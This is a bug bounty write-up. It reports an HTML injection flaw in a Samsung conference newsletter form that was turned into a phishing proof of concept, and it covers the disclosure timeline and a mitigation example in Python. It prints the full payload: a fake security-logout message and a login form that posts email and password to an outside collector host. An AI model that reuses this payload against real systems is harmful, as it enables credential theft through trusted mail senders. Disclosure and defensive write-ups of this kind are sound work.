InfoSec Write-ups


HTMLI to ATO leads to $$$ bounty 🤑

Hello Hackers! In this write-up I am going to discuss my recent finding on Samsung: how I found the bug and how, as a reward, they awarded me $$$ for it. This was my second bounty and my first bounty paid in dollars 🥳. So let's dive into the vulnerability.

[Cover image created by the author using DALL-E]

While testing Samsung's scope, I first ran a number of Google dorks to map out targets.

NOTE: If you want to learn about dorking (Shodan, Google and more), you can learn it from the write-ups of my best friend and mentor AbhirupKonwar, in which he covers lots of unique techniques you can use during bug hunting.


Through the dorks I came across the subdomain https://www.samsungdeveloperconference.com/, which has a newsletter subscription form: the user gives their first name, last name and email address to subscribe. The page looks like this:

[Image: Newsletter subscription form]

To test for HTML injection I simply gave my own email address, put payloads into the first name and last name fields and clicked Subscribe. Guess what: the payload worked, the subscription email rendered my HTML, and to show impact I demonstrated a fully working phishing PoC that leads to account takeover (ATO).

Payload in the first name field:
Dear Team

As part of our commitment to security, we have logged you out of your accounts due to recent updates in our system protocols. To ensure the safety and integrity of your account, please re-login using the secure link provided below.

<html>
<body>
<form action="https://burpcolloborator.com">Login again for security:<br><br>
<label for="u">Email id:
<input type="text" id="u" name="u"><br><br>
<label for="p">Password:
<input type="password" id="p" name="p"><br></br>
<input type="submit" value="Submit">
</body>
</html>

Payload in the last name field:
If you encounter any issues or have questions, feel free to reach out to our IT support team at. We appreciate your cooperation in keeping our systems secure.

Thank you for your understanding.

Best Regards,
Samsung Developer
<!--

The email with the malicious payload looks like this:

[Image: HTMLI rendered in the email]

Now, once the victim enters their email and password, the attacker receives the credentials and can take over the victim's account. Note that the mail comes from a legitimate Samsung email address, which makes the victim far more likely to trust it and enter their credentials.

After reporting, the Samsung team had a good response time and awarded me a $$$ bounty 🤑 for the report, but marked it as LOW severity 🤔. I think this should be at least P3 / medium severity, don't you think?

[Image: $$$ bounty 🤑]

Mitigation of HTMLI:

As a mitigation, the Samsung team built a proper whitelist of allowed characters and added checks that reject >, <, ., ,, ", ', %, etc. These checks were implemented not only client side but also server side, so that bypassing this bug is now next to impossible.
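To make the root cause and the fix concrete, here is an added example (my own illustration, not Samsung's code; the real template and the exact character set they chose are not published) of a newsletter mailer that interpolates the form fields into an HTML email. The vulnerable renderer sends whatever the subscriber typed as markup; the hardened renderer applies a server-side allow-list to the name fields and HTML-escapes them anyway, so even a gap in the allow-list cannot turn a name into a tag. The probe input is a constructed, harmless tag standing in for the write-up's payload.

```python
import html
import re

# Constructed example template; the real newsletter template is not on the page.
TEMPLATE = (
    "<html><body>"
    "<p>Dear {first} {last},</p>"
    "<p>Thanks for subscribing to the newsletter.</p>"
    "</body></html>"
)

# Illustrative allow-list (an assumption, not the vendor's actual rule): Latin letters,
# spaces, apostrophes, hyphens and dots, 1..80 characters. Angle brackets, quotes,
# percent signs and comment markers such as "<!--" fall outside it and are rejected.
NAME_ALLOWED = re.compile(r"^[A-Za-z\u00C0-\u024F' .\-]{1,80}$")


def render_vulnerable(first: str, last: str) -> str:
    """Interpolates the raw form fields into the HTML mail: any tag in a name goes out as markup."""
    return TEMPLATE.format(first=first, last=last)


def validate_name(name: str) -> bool:
    """Server-side allow-list check; False for anything outside the permitted character set."""
    return NAME_ALLOWED.fullmatch(name) is not None


def render_safe(first: str, last: str) -> str:
    """Rejects names outside the allow-list, then HTML-escapes them as a second layer."""
    for field, value in (("first name", first), ("last name", last)):
        if not validate_name(value):
            raise ValueError(f"{field} contains characters that are not allowed")
    # Escaping covers the case where the allow-list is later loosened: '<', '>', '&',
    # '"' and "'" become entities, so the name is always rendered as text, never as a tag.
    return TEMPLATE.format(first=html.escape(first, quote=True),
                           last=html.escape(last, quote=True))


if __name__ == "__main__":
    probe = "Alice<b>test</b>"          # constructed sample input, not the write-up's payload
    print(render_vulnerable(probe, "Smith"))  # the <b> tag survives and the mail client renders it
    print(validate_name(probe))               # False: rejected at the server before any mail is built
    print(render_safe("Anne-Marie O'Neil", "Smith"))  # apostrophe arrives as &#x27;, still readable
```

The allow-list runs on the server because client-side validation is only a usability aid: anyone can submit the form from a script or replay the request through a proxy. Escaping on output is kept as well, so the fix does not depend on the allow-list being perfect.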

Timeline:

2024-11-13: Reported

2024-11-26: Confirmed the bug was valid

2024-12-13: I told them that the fix was already deployed and asked for updates

2024-12-18: They confirmed that the fix was deployed and marked the severity as LOW

2025-01-06: Assured me that the Bugcrowd team would contact me soon and decided to award me $$$ 🤑

2025-01-11: Asked them to recheck the severity and suggested increasing it to P3

2025-01-16: They declined to increase the severity

2025-02-17: Awarded my very first bounty in $$$ 🥳

[Image: Bounty awarded through Bugcrowd 🥰]

I hope you found this write-up helpful and that it motivates you to hunt for more; consistency and persistence are the main keys in this field. I will see you in the next amazing one. Till then, bye 👋

Published in InfoSec Write-ups

A collection of write-ups from the best hackers in the world on topics ranging from bug bounties and CTFs to vulnhub machines, hardware challenges and real life encounters. Subscribe to our weekly newsletter for the coolest infosec updates: https://weekly.infosecwriteups.com/

Written by cryptoshant🇮🇳

Ethical Hacker | Bug Hunter🐞 | Offensive Security | Student | Cybersecurity Enthusiast ⚡

Responses (6)

🔥🔥Congrats buddy! More to come
Thanks for mentioning me 🤗🤗

--

Congratulations brother, I have a doubt bro: where to inject that HTMLI? In login forms? You say first name and last name field? Then you would inject this payload two times?

--

Epic brother, well done. Congratulations!

--